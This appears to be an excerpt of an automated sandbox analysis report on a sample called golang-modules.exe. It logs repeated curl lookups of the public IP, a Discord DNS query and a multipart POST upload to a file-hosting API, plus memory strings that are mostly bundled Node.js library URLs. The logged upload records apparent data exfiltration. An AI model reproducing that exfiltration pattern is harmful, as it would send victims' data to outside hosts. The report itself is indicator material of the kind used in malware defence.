Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: ptb.discord.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.filedoge.com
Source: unknownHTTP traffic detected: POST /upload HTTP/1.1Host: api.filedoge.comUser-Agent: curl/7.55.1Accept: */*Content-Length: 2908Expect: 100-continueContent-Type: multipart/form-data;; boundary=------------------------37f7683b98389407
Source: curl.exe, 00000009.00000002.109076141078.00000225D1880000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.109076247073.00000225D189F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.109075419882.00000225D189F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: curl.exe, 00000009.00000002.109076141078.00000225D1880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/--ssl-no-revoke
Source: curl.exe, 00000009.00000002.109076247073.00000225D189F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.109075419882.00000225D189F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/3J
Source: curl.exe, 00000009.00000002.109076247073.00000225D189F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.109075419882.00000225D189F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/5JB
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
Source: powershell.exe, 0000000F.00000002.109101780210.00000161A9C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000F.00000002.109101780210.00000161A9C78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.109101780210.00000161A9C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: golang-modules.exe, 00000000.00000003.109044614385.000001F1DB74E000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109043779570.000001F1DB7D7000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109037243696.000001F1DC545000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109043432322.000001F1DB74E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/tryghost/node-sqlite3
Source: golang-modules.exe, 00000000.00000003.109030732823.000001F1DB888000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109031329320.000001F1DB888000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109043598071.000001F1DB888000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109044162121.000001F1DB889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://n8.io/)
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://narwhaljs.org)
Source: powershell.exe, 0000000F.00000002.109098880419.00000161A18DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.109098880419.00000161A179A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.109086074863.00000161925F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109149103671.0000015DE5479000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109149103671.0000015DE55BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 0000000F.00000002.109086074863.0000016191721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD5401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/37519828
Source: golang-modules.exe, 00000000.00000003.109030732823.000001F1DB893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tootallnate.net)
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: powershell.exe, 0000000F.00000002.109101780210.00000161A9C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
Source: powershell.exe, 0000000F.00000002.109086074863.0000016191721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD5401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10704
Source: golang-modules.exe, 00000000.00000003.108991096588.000001F1D9A72000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
Source: powershell.exe, 00000011.00000002.109116423300.0000015DD668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.109116423300.0000015DD668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.109116423300.0000015DD668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/7848
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: golang-modules.exe, 00000000.00000003.109021034428.000001F1DB665000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109025862890.000001F1DB665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://domenic.me/)
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#body
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-body-consume-body
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-body-total-bytes
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-bodyinit-extract
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: golang-modules.exe, 00000000.00000003.109023842068.000001F1DB92B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR
Source: golang-modules.exe, 00000000.00000003.109023842068.000001F1DB92B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer.git
Source: golang-modules.exe, 00000000.00000003.109023842068.000001F1DB92B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer/issues
Source: powershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: golang-modules.exe, 00000000.00000003.109025862890.000001F1DB6D1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027303836.000001F1DB6D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Sebmaster/tr46.js#readme
Source: golang-modules.exe, 00000000.00000003.109025862890.000001F1DB6D1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027303836.000001F1DB6D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Sebmaster/tr46.js.git
Source: golang-modules.exe, 00000000.00000003.109025862890.000001F1DB6D1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027303836.000001F1DB6D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Sebmaster/tr46.js/issues
Source: golang-modules.exe, 00000000.00000003.109030732823.000001F1DB888000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109031329320.000001F1DB888000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109043598071.000001F1DB888000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109044162121.000001F1DB889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/file-uri-to-path
Source: golang-modules.exe, 00000000.00000003.109030732823.000001F1DB888000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109031329320.000001F1DB888000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109043598071.000001F1DB888000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109044162121.000001F1DB889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/file-uri-to-path/issues
Source: golang-modules.exe, 00000000.00000003.109030732823.000001F1DB893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-bindings
Source: golang-modules.exe, 00000000.00000003.109030732823.000001F1DB893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-bindings/issues
Source: golang-modules.exe, 00000000.00000003.109032560300.000001F1DB67A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109025264317.000001F1DB93F000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109032292214.000001F1DC542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3
Source: golang-modules.exe, 00000000.00000003.109032560300.000001F1DB67A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109025264317.000001F1DB93F000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109032292214.000001F1DC542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3.git
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
Source: golang-modules.exe, 00000000.00000003.109027536897.000001F1DBAE1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109028295749.000001F1DBAE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/andris9/encoding.git
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/antirez/linenoise
Source: golang-modules.exe, 00000000.00000003.109028295749.000001F1DBB01000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026575142.000001F1DBB01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite
Source: golang-modules.exe, 00000000.00000003.109028295749.000001F1DBB01000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026575142.000001F1DBB01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/issues
Source: golang-modules.exe, 00000000.00000003.109027536897.000001F1DBAFD000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109028295749.000001F1DBB09000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109028295749.000001F1DBB05000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026575142.000001F1DBB05000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109028295749.000001F1DBAFD000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026575142.000001F1DBB09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Javascript-source-file-encodings
Source: golang-modules.exe, 00000000.00000003.109027536897.000001F1DBAFD000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109028295749.000001F1DBB09000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109028295749.000001F1DBB05000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026575142.000001F1DBB05000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109028295749.000001F1DBAFD000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026575142.000001F1DBB09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Use-Buffers-when-decoding
Source: golang-modules.exe, 00000000.00000003.109023842068.000001F1DB8FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitinn/node-fetch
Source: golang-modules.exe, 00000000.00000003.109026575142.000001F1DBAC1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitinn/node-fetch)
Source: golang-modules.exe, 00000000.00000003.109023842068.000001F1DB8FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitinn/node-fetch.git
Source: golang-modules.exe, 00000000.00000003.109023842068.000001F1DB8FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitinn/node-fetch/issues
Source: golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitinn/node-fetch/issues/296#issuecomment-307598143
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/supports-color
Source: golang-modules.exe, 00000000.00000003.109018014171.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019677302.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109022761492.000001F1DB7D2000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023113789.000001F1DB83E000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019028033.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/cthackers)
Source: golang-modules.exe, 00000000.00000003.109018014171.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019677302.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109022761492.000001F1DB7D2000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023113789.000001F1DB83E000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019028033.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/cthackers/adm-zip
Source: golang-modules.exe, 00000000.00000003.109018014171.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019677302.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109022761492.000001F1DB7D2000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023113789.000001F1DB83E000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019028033.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/cthackers/adm-zip.git
Source: golang-modules.exe, 00000000.00000003.109018014171.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019677302.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109022761492.000001F1DB7D2000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023113789.000001F1DB83E000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019028033.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/cthackers/adm-zip/issues
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
